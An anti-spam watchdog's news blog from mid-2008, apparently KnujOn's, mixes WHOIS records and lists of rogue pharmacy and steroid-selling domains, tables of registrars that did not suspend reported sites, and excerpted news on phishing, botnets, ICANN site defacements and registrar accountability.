Domain Name: GOOVEAEAG.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.NS-EARTHLING.COM
Name Server: NS2.NS-EARTHLING.COM
Status: ok
Updated Date: 07-feb-2008
Creation Date: 07-feb-2008
Expiration Date: 07-feb-2009
| |
|
WHOIS DATA AS OF 2008/08/01 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
Domain Name: GEHRUEELS.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.VOBIUTE.COM
Name Server: NS2.VOBIUTE.COM
Status: ok
Updated Date: 18-feb-2008
Creation Date: 18-feb-2008
Expiration Date: 18-feb-2009
| |
|
August 14, 2008
Remember those Websites sponsored by U.S. Internet domain registrars that were recently exposed for illegally selling steroids? These sites are still pushing the drugs online, according to the anti-fraud watchdog groups that first discovered them. (See Hundreds of Websites Outed for Illegally Selling Steroids.)
The domain registrars hosting these sites as well as the Internet Corporation for Assigned Names and Numbers (ICANN), say their hands are tied when it comes to shutting down the steroid-selling sites, which KnujOn and LegitScript.com outed and reported to the registrars and ICANN last month.
But KnujOn and LegitScript argue that shutting down these sites should be a no-brainer.
"In the vast majority of Websites we identified, it was plain that [they] were offering these drugs, and doing so in a way that violates U.S. federal law. Frankly, one doesn't have to be an expert to see what these Websites are doing," says John Horton, president of LegitScript.
“We also received -- and in some cases, presented to the registrars -- information from the Website operator with information about the drugs (including photos) and instructions for payment," Horton says. "We think that these sites are fairly straightforward to identify in many cases, and the remedy -- termination -- is equally clear.”
(darkreading.com)
Prescription drug spammers are bankrolling botnet's growth, IronPort study says (darkreading.com)
LegitScript/Knujon Steroids Report
August 11, 2008
One of the MIT computer hackers who uncovered flaws in the CharlieCard system that would let passengers swipe free rides said he and his classmates offered to show T officials how to fix the problem, but instead were hauled into court and barred from speaking about their work.
“We made first contact,” said Zack Anderson, 21, a Los Angeles native, who majors in electronic engineering and computer science. “We wanted to let them know what we found and we wanted to tell them some ideas we had on how they could fix that system ... We felt like the issue was resolved. That was verbally affirmed in a Monday meeting. Then Friday we find out there’s a federal lawsuit against us.”
On Saturday morning, federal Judge Douglas Woodlock granted the MBTA a restraining order that blocked Anderson and classmates R.J. Ryan and Alessandro Chiesa from presenting their A-graded paper at DEFCON 16, an annual hackers conference in Las Vegas.
(bostonherald.com)
August 7, 2008
A website infected with malware is detected every five seconds - a dramatic
increase over the last 12 months due to the rise in SQL injection attacks.
Websites poisoned with malware capable of infecting visitors' machines are
being discovered at a rate of 16,173 per day - three times faster than in
2007.
(silicon.com)
August 6, 2008
A ring of identity thieves that targeted U.S. retailers used sophisticated and multifaceted attacks to steal more than 40 million credit and debit card numbers from TJX, OfficeMax, Barnes & Noble and other companies, according to court documents.
The attacks cost retailers and credit card companies tens of millions of dollars.
Members of the ID theft conspiracy used so-called wardriving techniques to find holes in wireless networks operated by retail stores. Once inside the networks, the thieves located and stole credit card transaction information stored on the retailers' networks, according to court documents.
(networkworld.com)
August 5, 2008
KnujOn has found at least 19 rogue pharmacy domains, sponsored through
DIRECT INFORMATION PVT LTD D/B/A PUBLICDOMAINREGISTRY.COM (PDR), which were
reported by the Registrar as Suspended, back in operation with the same content,
at the same nameservers. The nameserver: canadamenrx.com, is also sponsored by PDR and
is itself an unlicensed pharmacy site. This is an example of a practice we have seen all
too frequently where Internet companies will remove sites temporarily for reported
policy violations only to restore them shortly afterwards. In some cases the domains
move from one Registrar to another (occasionally two Registrars with the same
parent company, however), but this is a situation where the domains went right back where they
were before. DIRECT INFO/PUBLICDOMAINREGISTRY was rated the 9th Worst Registrar in
terms of sponsoring spam sites previously. Below for each domain is a copy of the
suspension report sent by the Registrar to ICANN in May paired with the site content as of August 3, 2008.
| Report from Registrar to ICANN | | Current Content |
|---|
| |
|
Domain Name: AMERICANPERFECTMEDS.COM
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000
| |
|
Domain Name: BUYAMERICANSTOREDRUGS.COM
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000
| |
|
Domain Name: EWORLDTRUSTEDDRUGSTORE.COM
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000
| |
|
Domain Name: NEWDIRECTDRUGSTORE.NET
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000
| |
|
Domain Name: THEWORLDTRUSTTABLET.NET
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000
| |
|
Domain Name: USAFASTPILLS.NET
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000
| |
|
Domain Name: YOURTORONTOMENPHARMACY.NET
Registrant:
Directi False Whois Suspended Account
Directi False Whois Suspended Account
(inaccuratewhois@suspended-domain.com)
This Domain is Suspended
Due to inaccurate Whois
Contact Support Desk
null,0000
US
Tel. +00.0000
| |
|
Full List
americanperfectmeds.com (opens PDF)
buyamericanstoredrugs.com
buyglobaldeliverytablet.com
buystorerx.com
canadamenrx.com
canadastorepill.net
canadastoretablet.net
eshoppill.net
eusastoredrugs.net
eworldtrusteddrugstore.com
fortorontomendrugs.com
gettopdrugstore.net
hotglobaltrustmeds.com
newdirectdrugstore.net
theplanetpill.net
theworldtrusttablet.net
usafastpills.net
webcanadafastcapsules.com
yourtorontomenpharmacy.net
August 4, 2008
A KnujOn review of 7900 recent follow up reports found
340 were active after being reported to ICANN as "suspended" or "deleted." Some were still conducting the same illicit commerce
uninterrupted while being listed as suspended. While these complaints were driven by false Whois registrations, some registrars
went as far as to put "Suspended for spamming" into the status fields, however KnujOn found these domain names were still
open for business.
| Registrar | | Count NOT
Suspended |
|---|
| afternic, inc | | 8 |
| allearthdomains.com llc | | 1 |
| annulet, inc | | 9 |
| answerable.com (i) pvt. ltd. | | 2 |
| best registration services, inc | | 1 |
| chocolatecovereddomains, llc | | 1 |
| computer services langenbach gmbh dba joker.com | | 3 |
| direct information pvt ltd d/b/a publicdomainregistry.com | | 70 |
| domainamania.com llc | | 2 |
| domaindiscover | | 91 |
| domainpeople, inc. | | 2 |
| domainraker.net llc | | 1 |
| domainroyale.com llc | | 1 |
| domainsoftheday.net llc | | 1 |
| domainsouffle.com llc | | 1 |
| domainstream.ca inc. | | 2 |
| dotarai co,. ltd. | | 8 |
| dotster, inc. | | 2 |
| dstr acquisition vii, llc | | 13 |
| eunameflood.com llc | | 1 |
| fabulous.com pty ltd. | | 3 |
| gmo internet, inc. dba onamae.com and discount-domain.com | | 2 |
| hichina web solutions (hong kong) limited | | 11 |
| innerwise, inc. d/b/a itsyourdomain.com | | 5 |
| intercosmos media group, inc. d/b/a directnic.com | | 1 |
| moniker online services, inc. | | 9 |
| name perfections, inc. | | 1 |
| namearsenal.com llc | | 1 |
| namecroc.com llc | | 1 |
| nameemperor.com llc | | 1 |
| namevolcano.com llc | | 2 |
| octopusdomains.net llc | | 1 |
| oregoneu.com llc | | 1 |
| oregonurls.com llc | | 1 |
| pdxprivatenames.com llc | | 2 |
| red register, inc. | | 2 |
| registration technologies, inc. | | 53 |
| savemorenames.com inc | | 4 |
| savethename.com llc | | 1 |
| wild west domains, inc. | | 1 |
| yesnic co. ltd. | | 1 |
| youdomain.com llc | | 1 |
July 30, 2008
Be on the lookout for spam e-mail spreading malicious software (malware) which mentions “F.B.I. vs. facebook.” The e-mail directs the recipient to click on a link to view an article about the FBI and Facebook. Once the user clicks on the link, the “Storm Worm” malware is downloaded to the Internet-connected device, causing it to become infected with the virus and part of the Storm Worm botnet. A botnet is a network of compromised machines under the control of a single user. Botnets are typically set up to facilitate criminal activity such as spam e-mail, identity theft, denial of service attacks, and spreading malware to other machines on the Internet.
The Storm Worm virus has capitalized on various holidays and fictitious world events in the last year by sending millions of e-mails advertising an e-card link within the text of the spam e-mail.
(myfoxtwincities.com)
July 28, 2008
Safe Mail Services is the leader in email marketing for small businesses. Web based server allows members to blast over 3 Million emails per day. All recipients are double opt-in making Safe Mail Services 100% SPAM law compliant. Recipient database is filled with prospects who have asked to be included in safe-list, so you know your ad will reach real customers. All blasts go out from Safe Mail Services email server which members access through login from this website. You will not be taken to a 3rd party service like many of Safe Mail Services competitors. And since all blasts are done by Safe Mail Services server your ISP will have no idea you are even using an email service. Are you tired of promoting your product with no results? How would you like to wake up each morning only to find your email box filled with orders? That's where we come in. Our email list will allow your business to grow day after day, week after week and month after month without any additional fees or charges.
(ehow.com)
July 27, 2008
A Romanian man pleaded guilty Tuesday to a federal fraud charge for his role in setting up fake Web sites in order to steal credit and debit card details.
Ovidiu-Ionut Nicola-Roman, 22, could also face a US$250,000 fine, according to the U.S. Department of Justice (DOJ). Nicola-Roman pleaded guilty to one count of conspiracy to commit fraud.
Nicola-Roman is one of 38 people of several nationalities charged in May with running a cybercrime ring centered around spam and phishing. In just one incident, the crew sent 1.3 million spam messages luring people to visit Web sites they had built to collect financial details.(pcworld.com)
July 26, 2008
A new report by two Internet watchdog groups has identified hundreds of Web sites that illegally sell anabolic steroids without prescriptions or verifying the age of customers. The report, Pumped Up on the Internet, was issued by the watchdog groups LegitScript.com, which studies online pharmacies, and KnujOn.com, which investigates senders of spam e-mail. It focused on 156 sites that have registered their domain names through American companies but send the steroids from abroad. The report said that while federal drug authorities might lack jurisdiction abroad, the eight American domain registry companies used by these sellers had the legal right and obligation to terminate the rogue pharmacy sites.
(nytimes.com)
July 25, 2008
OTTAWA - Don't take the bait is the message Carleton University has for
campus e-mail users after a "phishing" expedition caused a huge e-mail
traffic jam earlier this week. "Phishing" occurs when a person receives
an e-mail asking them to hand over personal information, such as passwords
for e-mail accounts. If the person responds with the requested
information, it can be used for nefarious purposes, such as sending out
thousands of spam e-mails. "It's like giving someone the key to your
house," said Ralph Michaelis, Carleton's chief information officer. The
school discovered on Monday that access had been gained through one
student account. That allowed hackers to send out tens of thousands of
e-mails, effectively jamming the system. The problem was resolved within
hours, but it took until Wednesday for the congestion to clear, Mr.
Michaelis said...(canada.com)
July 24, 2008
From the penthouse to the Big House(theregister.co.uk)
July 23, 2008
Registrars turn blind eye to sites selling illegal steroids: Next time you see websites brazenly pushing anabolic steroids, thank GoDaddy, Dynadot and a half-dozen other US-based registrars, which allow them to operate even though they're illegal, claims a new report.
Released Monday, the report catalogs 156 websites offering steroids without a prescription or verifying that the would-be buyer is over 18 years old. Such practices are a violation of laws in the US and in many other countries and a violation of the terms of service the registrars impose on their customers. All eight of the registrars are, concludes the report, turning a blind eye to the practice.
(theregister.co.uk)
Report aims to decrease illegal steroid sales online: At least 156 Web sites selling anabolic steroids without the necessary prescription are run through domain name registrars in the U.S., according to a report released Monday.
(mywesttexas.com)
The steroid-selling sites aren’t your typical phony online pharmacies. “With general RX sites, there is a lot of variety. Some are merely stealing credit card numbers, others ship knockoff or counterfeit drugs, and others sell diverted market product which is the real thing but may be expired, under dosage, or rerouted from its original destination.
“With the steroid sites, there is much more involvement in the trade. The sites are more personalized and not as cold as the fake pill sites,” Bruen says. “If you look through some of the steroid forums out there, people complain about lots of fake supplements on the Internet. The sites we're looking at claim to offer the real thing and no ‘bad’ versions.”
(darkreading.com)
Easy for youth to get anabolic steroids
(upi.com)
Steroid sales still flourishing on the Web
(weblog.infoworld.com)
Kids at Risk: Report Identifies 150 Websites Selling Anabolic Steroids
(marketwatch.com)
Report: U.S. registrars won't take down illegal steroid sites
(stopbadware.org)
The report also found that every one of the needle-pushing URLs involved were registered with eight domain name registrars, all of whom are located in the United States.
In most cases, the parties behind the sites have used anonymous registration services -- services that many security researchers have named as a root cause of the continued proliferation of online cyber-crime. In all the other cases involved the registered parties are located outside of U.S. borders.
(eweek.com)
July 22, 2008
Parava Networks, Inc. dba 10-Domains.com was one of the eight registrars cited in Knujon and LegitScript's
Steroid Report and our letter to them was returned by
the post office as undeliverable. This is quite shocking in light of the recent scandal involving
67 Registrars that were in undisclosed locations. The internic.org directory of Registrar addresses has
been updated since the Knujon disclosure. But now we have a new problem, the provided addresses are not real.
So what we have here is a Registrar that sponsors steroid related sites and is also apparently unresponsive and unaccountable. The issue
has been referred to ICANN.
July 21, 2008
Networks of steroid dealing domains are sponsored through U.S.-based
companies who refuse to shut them down even after being notified.
LegitScript.com and Knujon.com have worked together to develop a report
concerning extensive steroid distribution networks online. Steroids
designated by the Department of Justice as “Schedule 3 Substances”
were found at the 156 web domains listed in this report. The easy
availability of illicit substances through these domains is shocking.
Even more shocking is the lack of cooperation from the Registrars that
sponsor these sites. On July 1 we issued joint letters to eight
registrars: Abacus America,
DSTR Acquisition VII,
Dynadot.com,
Everyones
Internet,
eNom Inc
(also cited in the Ten Worst Registrars Report),
EstDomains Inc,
GoDaddy/Wild West, and
Parava
Networks Inc. In these letters we listed the websites, described the
banned substances offered at each, and detailed how these sites were
violating Internet policy, the Registrar’s own terms of service, and
the law. Only three Registrars responded, two declining to cooperate,
one stating they would look into it after several strong emails. A
letter to one Registrar, Parava Networks Inc, was returned by the Postal
Service as undeliverable, calling into question the general legitimacy
of this particular company.
While no one is accusing any of these Registrars of being actively
involved in the illicit distribution, it is a simple fact that none of
these sites would exist without the sponsorship of these Internet
companies. Some Registrars may feel their first obligation is to their
customers, but their real primary obligations are to the law and the
stability of the Internet registration system. Everyone who registers an
Internet domain is required to affirm that they “are not registering
the domain name for an unlawful purpose” and the Registrar is required
to ensure that this policy is enforced. For too long there has been a
false perception that the Internet is lawless, but it isn’t. The rules
are just not enforced and the stakeholders have been unaccountable.
Knujon and LegitScript feel that these Registrars also have a moral and
ethical responsibility to the public since the sale and distribution of
these illicit substances poses a grave health risk. These websites
purport to offer steroids to anyone without prescription or age
verification. It is our hope that in releasing this information public
awareness of the problem will increase.
The full Steroid Report is available here:
http://legitscript.com/Steroid%20Report.pdf
The press release is here:
legitscript.com/newsitems/show/10
A list of the Registrars, web domains in question, the substances
offered at each, and samples of the site content can be viewed here:
knujon.com/schedule3/dir.html
July 19, 2008
Almost everyone hates spam. The only people that don't hate it are the
ones that make vast amounts of money from sending it. The profits they
turn are so large that regardless of what spam fighters do, the amount of
spam keeps increasing. According to web security firm MessageLabs, spam
accounted for 81.5 percent of all e-mail traffic in June.
(arstechnica.com)
July 18, 2008
An examination of nearly 2.5 million Web pages at some of the Internet's
most popular and trusted sites turned up at least 128,000 links that could
be manipulated by fraudsters and virus writers to make online scams more
believable, a study released this month found. Scammers and phishers are
taking advantage of commonly used coding used in "redirects" to divert
traffic from reputable Web site to sites that could harbor malicious
software or phishing schemes...
(blog.washingtonpost.com)
July 17, 2008
Apparently in response to KnujOn's disclosure of 67 Registrars in Undisclosed Locations, ICANN has completed
a mass update of the Internic Registrar address directory. Oddly enough, 20 of the newly updated Registrars are all at the same address:
!!! BB Bulk, Inc. dba My Name Now
A Mountain Domains, Inc.
A. W. B. Trading, Inc.
AO Domains, Incorporated
Black Ice Domains, Inc.
Colorado Names Domains, Inc.
Emily Names Domains, Inc.
Get SLD, Inc.
Jetpack Domains, Inc.
JJH Investments, LLC
Lazy Dog Domains, Inc.
Oil Change Domains, Inc.
Pitchback Domains, Inc.
Slaphappy Domains, Inc.
Snowflake Domains, Inc.
Total Calories, Inc. dba Slim Names
Valley Apples, Inc.
Walela Brook, Inc.
WGB Registry, Inc.
White Socks Domains, Inc.
July 16, 2008
One minute behind bars for every junk mail
(theregister.co.uk)
July 15, 2008
LONDON (Reuters) - Prices charged by cybercriminals selling hacked bank
and credit card details have fallen sharply as the volume of data on offer
has soared, forcing them to look elsewhere to boost profit margins, a new
report says. Researchers for Finjan, a Web security firm, said the high
volumes traded had led to bank and credit card information becoming
"commoditised" - account details with PIN codes that once fetched $100 (50
pounds) or more each might now go for $10 or $20. In its latest quarterly
survey of Web trends, the California-based company said cybercrime had
evolved into "a major shadow economy ruled by business rules and logic
that closely mimics the legitimate business world". Finjan's Israel-based
chief technology officer, Yuval Ben-Itzhak, said in a telephone interview
that new types of stolen data were now commanding a premium, such as
patient healthcare information that can be used for insurance fraud or to
illicitly acquire and sell medicines. Other premium data includes
business information, company personnel files and intercepted commercial
emails...
(uk.reuters.com)
July 11, 2008
In the first case of its kind in the nation, a Wyoming man has been
charged with using modified peer-to-peer software to infect computers and
create "botnets" - armies of compromised computers numbering from
5,000 to 15,000 machines - that he exploited to obtain credit card and
banking information.
(usdoj.gov)
July 10, 2008
One month ago KnujOn reported
that 70 Registrars were in Mystery locations, that their address, phone numbers
and even country were not listed in the Internic/ICANN directory of accredited registrars. We reported this to
ICANN and since then we have noted that 8 of the 70 have been updated but 5 NEW registrars have been added with no location or country
information, changing the total to 67. 8 Registrars do not have their country of location listed. While it would be possible
to research these locations, the consumer should not have to. This is about building public trust and confidence. Full list
is below:
| !!! BB Bulk, Inc. dba My Name Now | No Change |
| # 1 DotMobi Registrar, Inc. | No Change |
| 10dencehispahard, S.L. (New) | No Address, No country |
| 123 Registration, Inc. | No Change |
| 35 Technology Co., Ltd. (New) | No Address, No country |
| 8068 Registrar, Inc | No Change |
| A Mountain Domains, Inc. | No Change |
| A. W. B. Trading, Inc. | No Change |
| Above, Inc. | No Change |
| Alisoft (Shanghai) Co., Ltd. | No Change |
| Anytime Sites, Inc. | No Change |
| AO Domains, Incorporated | No Change |
| Arctic Names, Inc. | No Change |
| Backslap Domains, Inc. | No Change |
| Best Bulk Register, Inc. | No Change |
| Black Ice Domains, Inc. | No Change |
| Bottle Domains, Inc. | No Change |
| China Springboard, Inc. (New) | No Address, No country |
| CodyCorp.com Inc. | No Change |
| Colorado Names Domains, Inc. | No Change |
| Commerce Island, Inc. | No Change |
| Cool Ocean, Inc. | No Change |
| Crisp Names, Inc. | No Change |
Directi Internet Solutions Pvt. Ltd.
d/b/a PublicDomainRegistry.com | Previously claimed to be in Beaverton, OR,
changed country to India but still has no actual address listed |
| DNGLOBE LLC | No Change |
| Domain Jingles, Inc. | No Change |
| DomainCannon.com LLC | No Change |
| Domerati, Inc. | No Change |
| Dootall, Inc. | No Change |
| Dotregistrar, LLC | No Change |
| Dotted Ventures, Inc. | No Change |
| Dynamic Dolphin, Inc. | No Change |
| ELB Group Inc | No Change |
| Emily Names Domains, Inc. | No Change |
| European NIC Inc. | No Change |
| FBS Inc. | No Change |
| Freeparking Domain Registrars, Inc. | No Change |
| Get SLD, Inc. | No Change |
| Good Luck Internet Services PVT, LTD. | No Change |
| Hostalia USA, Inc. | No Change |
| Interdominios, Inc. | No Change |
| IPNIC, Inc | No Change |
| Jetpack Domains, Inc. | No Change |
| JJH Investments, LLC | No Change |
| Lazy Dog Domains, Inc | No Change |
| Naming Web, Inc. | No Change |
| NEEN.IT Inc., d/b/a namesprit.com | No Change |
| NetraCorp LLC dba Global Internet | No Change |
| NIC1, Inc | No Change |
| Oil Change Domains, Inc. | No Change |
| Own Identity, Inc. | No Change |
| Pitchback Domains, Inc. | No Change |
| Pointag Technologies, Inc. | No Change |
| Slaphappy Domains, Inc. | No Change |
| Snowflake Domains, Inc. | No Change |
| Thought Convergence, Inc. | No Change, No country |
| Threadagent.com, Inc. | No Change |
| Total Calories, Inc. dba Slim Names | No Change |
| USA Intra Corp. (New) | No Address, No country |
| united-domains AG | No Change, No country |
| Valley Apples, Inc. | No Change |
| Verelink, Inc. | No Change, No country |
| Walela Brook, Inc. | No Change |
| Website Source, Inc. (New) | No Address, No country |
| Western United Domains, Inc. | No Change |
| WGB Registry, Inc. | No Change |
| White Socks Domains, Inc. | No Change |
July 9, 2008
Computer industry heavyweights are hustling to fix a flaw in the foundation of the Internet that would let hackers control traffic on the World Wide Web.
Major software and hardware makers worked in secret for months to create a software "patch" released on Tuesday to repair the problem, which is in the way computers are routed to web page addresses.
"It's a very fundamental issue with how the entire addressing scheme of the Internet works," Securosis analyst Rich Mogul said in a media conference call
(breitbart.com)
July 8, 2008
The international organization that oversees the Web's top-level domain naming system said that the hijacking last month of several of its domains was due to a security breach at the registrar that manages those URLs.
Although it did not name the registrar explicitly, according to WHOIS searches, New York-based Register.com manages the domains that were redirected, as well as the primary icann.org and iana.org domains.
Two weeks ago, Turkish hackers rerouted traffic to some of the domains used by ICANN (Internet Corporation for Assigned Names and Numbers) and one of its subsidiary organizations, IANA (Internet Assigned Numbers Authority).
(nytimes.com)
July 7, 2008
Contrary to the current speculation,
KnujOn is not totally tying up ICANN. The truth about what is preventing reports from reaching ICANN is much more sinister.
While ICANN was meeting in Paris, some of their mirror sites were hacked/vandalized. Since public
disclosure of this event was unavoidable, ICANN responded by acknowledging not one, but two attacks:
"
In a separate and unrelated incident a few days later, attackers used a very recent exploit in popular blogging software Wordpress to target the ICANN blog. The attack was noticed immediately and the blog taken offline while an analysis was run. That analysis pointed to an automated attack. The blogging software has since been patched and no wider impact (except the disappearance of the blog while the analysis was carried out) was noted.
"
Aside from these intrusions, ICANN's very compliance interface appears to be under attack, possibly a
denial of service attack, flooding their servers with requests, similar to ones that
targeted CastleCops last year. Obviously this is designed to prevent consumers from submitting complaints. This comes after
ICANN issued enforcement notices against troublesome
registrars. This "front end" assault seems to be paired with a "back end" denial
from certain registrars who are blocking access to their registration records. This combination of
traffic jam and record denial has made ICANN's compliance system more or less inoperable.
Were this situation unexpected it would be forgivable. Unfortunately, at a June 11, 2007 presentation Knujon
warned ICANN about this very event. We expressed serious concern that ICANN's compliance system would be
the target of cyber attacks. Sadly, our warnings were not heeded.
Denial of service attacks have moved beyond threats to specific organizations to
entire countries
like Lithuania and The Marshall Islands.
In order to ensure the stability and security of the Internet, ICANN needs to work more proactively on
these threats.
July 6, 2008
Auto Warranty Insurance renewal scam
"a recorded message to my cell phone with an offer to extend the soon expiring warranty of a car that we currently own."
July 5, 2008
In a unique experiment called Super Spam Me, 50 people from around the world surfed the web unprotected for a month, actively engaging with spammers and heading into the parts of the internet most of us avoid, to find out just how much spam they could attract and what the effect would be.
(timesonline.co.uk)
July 4, 2008
IntelliShield Analysis: Relaxing the rules for domain names and approved
character sets could open up new opportunities for Internet adoption, spur
business opportunities in an already-crowded domain namespace, and
internationalize DNS infrastructure, but there are also many potential
pitfalls. According to a recent report from KnujOn, a site devoted to
reducing unsolicited commercial e-mail, 90 percent of illicit domains
share the same 20 registrars.
(cisco.com)
July 3, 2008
Auto Warranty Insurance renewal scam
"A recorded voice called me on my cell to tell me my vehicle warranty was about to expire"
21 calls reported from this number.According to 4 reports the identity of this caller is Linda Wospil
Telemarketer: Auto Factory Warranty/File Complaint
July 2, 2008
It creates a local copy of itself called c:\windows\msvecurity.exe,
which is what gets executed.
(garwarner.blogspot.com)
July 1, 2008
eBay was ordered to pay nearly 40 million euro to a luxury goods company,
because it has allowed the sale of counterfeit goods. According to The
Press Association, the online auction site has to pay LVMH, which deals
with famous brands like Louis Vuitton, Givenchy, Fendi, Dior, Emilio Pucci
and Marc Jacobs, £30 million. eBay was accused of not checking the
authenticity of the products and allowed the sale of fake Louis Vuitton
handbags and Dior perfumes."
(efluxmedia.com)
June 30, 2008
Reporting on a Nevada Corporation, VeriResume, PhishBucket pointed out flaws in their job offers, and criticized how they appeared to do business. PhishBucket editor, Tabatha Marshall provided her research findings, suggesting that job seekers do their homework before giving away their personal information to this suspicious company. “VeriResume appeared to send emails in a manner that had all the hallmarks of a classic phishing scheme,” said Marshall.
...
It turns out that VeriResume is owned by Internet Solutions Corp. (ISC), and Alec Difrawy, who was formerly convicted of and sentenced for fraud. Author Les Henderson recently wrote a book called “Under Investigation,” which discussed Difrawy’s shady criminal past – including similar job agency schemes and allegations of horrific child abuse.
(phishbucket.org)
So once again we see an Internet company that seems to be owned by someone previously convited of fraud.
Anonymous Domain Sales: A Spammer's Delight
'Spam King' to pay $6 million to MySpace
Scott Richter is a Registrar?!?!
June 29, 2008
An anonymous reader writes "A GoDaddy Vice President has been caught
bidding against customers in their own domain name auctions. The employee
Adam Dicker isn't just any GoDaddy employee; he's head of the GoDaddy
subsidiary that controls the auctions. Dicker won some of the domains he
bid for, and pushed up the bid price on auctions he didn't win. The
conflict of interest is unethical
(tech.slashdot.org)
June 28, 2008
According to new rules unanimously passed by the Internet Corporation
for Assigned Names and Numbers, or Icann, at its meeting here, any
company, organization or country will soon be able to apply for a new
Web address extension, called a top-level domain.
The Icann board also passed another less controversial proposal that
would allow these domains to be registered in scripts other than Roman
characters, like Chinese, Arabic and Cyrillic. Specific countries could
receive the equivalent of their two-letter country code, like Bulgarias
.bg, in their native alphabet.
(nytimes.com)
Some folks think this will result in "no
change", but the no change we're concerned with is the lack of attention
to security issues by ICANN. It's entirely possible that the release of
these unique TLDs will not increase the level of criminality on the
Internet, but our issue is that the responsibility over the existing
structure has been sidestepped.
When a car company builds a new model they smash it into a wall 100
times to see what happens. I don't see this kind of forethought or
testing with the 'Net. The ability of the market to produce new
technology will always outpace the security structure's ability to
defend against abuses. How long did it take the banks to wake up to
phishing? How long did it take for law enforcement spread digital
forensics? How long did it take for networks to protect against viruses?
We're talking about years before efficient standard practices became
common place.
ICANN has fumbled the ball on it's two core responsibilities:
- Keep the Whois accurate - We all know it isn't
- Keep criminals from becoming registrars and registrars from becoming
criminals - See above and below
The unique TLD program seems like a diversion, rather than addressing
realistic concerns about fraud and abuse they're throwing candy and
coins to the crowd like Eva Peron.
June 27, 2008
OnLine Drug Danger - AC360 Daily Podcast: 06/25/2008
(cnn.com)
June 26, 2008
The ICANN and IANA websites were defaced earlier today by a Turkish group called "NetDevilz". ICANN is responsible for the global coordination of the Internet's system of unique identifiers. These include domain names, as well as the addresses used in a variety of Internet protocols. The Internet Assigned Numbers Authority (IANA) is responsible for the global coordination of the DNS Root, IP addressing, and other Internet protocol resources.
Their domains were redirecting to a hosting space at "atspace.com" where the defacers left the following message:
"You think that you control the domains but you don't! Everybody knows wrong. We control the domains including ICANN! Don't you believe us?"
(zone-h.org)
ICANN Asked To Shut Down "Worst" Chinese Registrar
PASSING THE SPAM BUCK - Why one report suggests registrars share the blame
Will ICANN take action against "worst" Chinese registrar?
Anonymous Domain Sales: A Spammer's Delight
70 Registrars are in mystery locations
"Worst Spam Offenders" Notified by ICANN
Most Spam Sites Tied to a Handful of Registrars
90% of the Illicit Sites Tracked by KnujOn Clustered at 20 registrars
June 25, 2008
Citizens of the Marshall Islands in the South Pacific have been left without a functioning email systems following a denial of service attack on the country's sole ISP.
It could take days to full restore service, the general manager of the Marshall Islands National Telecommunications Authority (NTA) told Radio New Zealand International. Systems at the monopoly carrier were taken offline by a flood of email traffic from compromised PCs.
(theregister.co.uk)
June 24, 2008
The report from StopBadware.org also showed a dramatic rise in China's role in the malware epidemic. Six of the 10 networks were internet service providers or backbone providers based in China and hosted more than 41 percent of the malicious websites.
The findings come a few weeks after anti-spam outfit Knujon released a separate report that found that almost 75 percent of spam sites were signed up by just 10 registrars. Once again, the three biggest offenders were located in China and included Xinnet Bei Gong Da Software, BEIJINGNN and Todaynic.
(theregister.co.uk)
June 22, 2008
On the eve of a crucial meeting for ICANN, the chairman of its Governmental Advisory Committee tells us what he expects the Paris meeting's main topics of discussion will be.
(domainesinfo.fr)
La liste noire des registrars
June 21, 2008
[KnujOn] also observed registrars, “not following up quickly when certain complaints are issued, not really engaging the consumer…” and “dismissing [their] concerns about fraud on the internet”. However, he does not lay blame on registrars alone. “ICANN shares some of the blame, he states. “They do have a responsibility/contractual obligation to do certain duties.” And that responsibility reaches farther, in his view, to ISP’s, and even companies victimized by online fraud “for not protecting their brands in an aggressive way.” He also strongly feels government agencies, too should do more—the FBI, the FDA—anybody responsible for overseeing any type of commerce.
(namesmash.com)
June 20, 2008
I verified that the samples (knujon) used to make this point -- fallspot.com, finest-favorite.com, kheenerso.com, mountainfavor.com, rsavefu.com, tioakjiopa.com, exellentquality.com, polaebrue.com, orderheres.com, keesnerrt.com, killsioe.com, hiaoteyy.com, vijeast.com, and tinescoz.com -- were indeed spam storefronts for replica watches and online pill merchants.
All were registered through Xinnet, although in more than half the cases, there was no WHOIS contact information listed. A few others had obvious fake names and contact information, such as Fallspot's "David Fox," whose listed Chinese phone number ended in seven zeroes and had an email address of "test@test.com."
Among the handful of sites that did include real-looking contact information, most email addresses and phone numbers turned out to be bogus...
When asked for comment, the ICANN spokesperson issued the following statement:
"ICANN has received the document from Knujon, and Xin Net, along with other registrars that have a high percentage of unchanged Whois inaccuracy reports filed through the WDPRS, are being investigated by ICANN. Until the investigation is concluded and determinations are made, it would be inappropriate for ICANN to comment on the details of the matter."
(thestandard.com)
June 19, 2008
The
recent disclosure of the true ownership of PrivacyProtect.org in
SecurityFix has drawn praise, rancor and little spam. The comment section of
SecurityFix has been loaded up with gibberish messages like: "ktmjnw xdkjbsfmp vnac imsedkrah cmaon mhpeq lfdcenh" and
accusations that the Washington Post is run by the CIA.
Obviously there are some people who would rather we not discuss the anonymous ownership of anonymous registry services used
by fake pharmacies.
June 18, 2008
The gist of the latest KnujOn memo to ICANN is that Xin Net has over the last year
